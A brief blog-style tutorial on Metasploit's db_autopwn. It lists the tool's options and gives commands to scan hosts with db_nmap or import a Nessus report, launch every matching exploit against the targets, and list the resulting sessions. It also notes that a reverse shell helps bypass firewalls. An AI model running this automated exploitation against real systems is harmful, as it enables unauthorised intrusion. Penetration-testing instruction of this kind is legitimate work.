Basic Metasploit framework autopwn attack

Basic Metasploit framework autopwn attack





当然你也可以用直接Backtrack 5的系统,因为以上工具都已集成在此系统中了。




[*] Usage: db_autopwn [options]
-h          Display this help text
-t          Show all matching exploit modules
-x          Select modules based on vulnerability references
-p          Select modules based on open ports
-e          Launch exploits against all matched targets
-r          Use a reverse connect shell
-b          Use a bind shell on a random port (default)
-q          Disable exploit module output
-R  [rank]  Only run modules with a minimal rank
-I  [range] Only exploit hosts inside this range
-X  [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m  [regex] Only run modules whose name matches the regex
-T  [secs]  Maximum runtime for any exploit in seconds

The ones marked in bold are the ones that we will use in this guide. However option “-r” is also quite useful, as a reverse shell has a higher chance of bypassing a firewall once you have successfully exploited a host. Also you can use “-q” if you don’t want to see all the module executions during autopwn.

First we will look into using db_nmap.

You need to scan the host(s) for open ports so that autopwn knows which ports are open.

db_nmap -sV [IP]

Then you just execute autopwn:

db_autopwn -p -e

Now just watch as the exploits ‘flow’. When they finish you can check if any of the exploits succeeded by doing:

sessions -l

The other method, which I personally find more effective is using Nessus to predetermine the vulnerabilities of the target host. After a successful scan has finished, go to Reports, select the scan you had just done and there is a button called “Download report”. Save it as .nessus somewhere on your HDD.

Then in msfconsole do:

db_import /path/to/.nessus

db_autopwn -x -e

Once again you will see the flow of exploits (unless you specified the -q option as well). To check if any of the exploits actually worked, once again do

sessions -l

I will soon post about what can be done once the host has been exploited successfully and a guide on using the meterpreter session.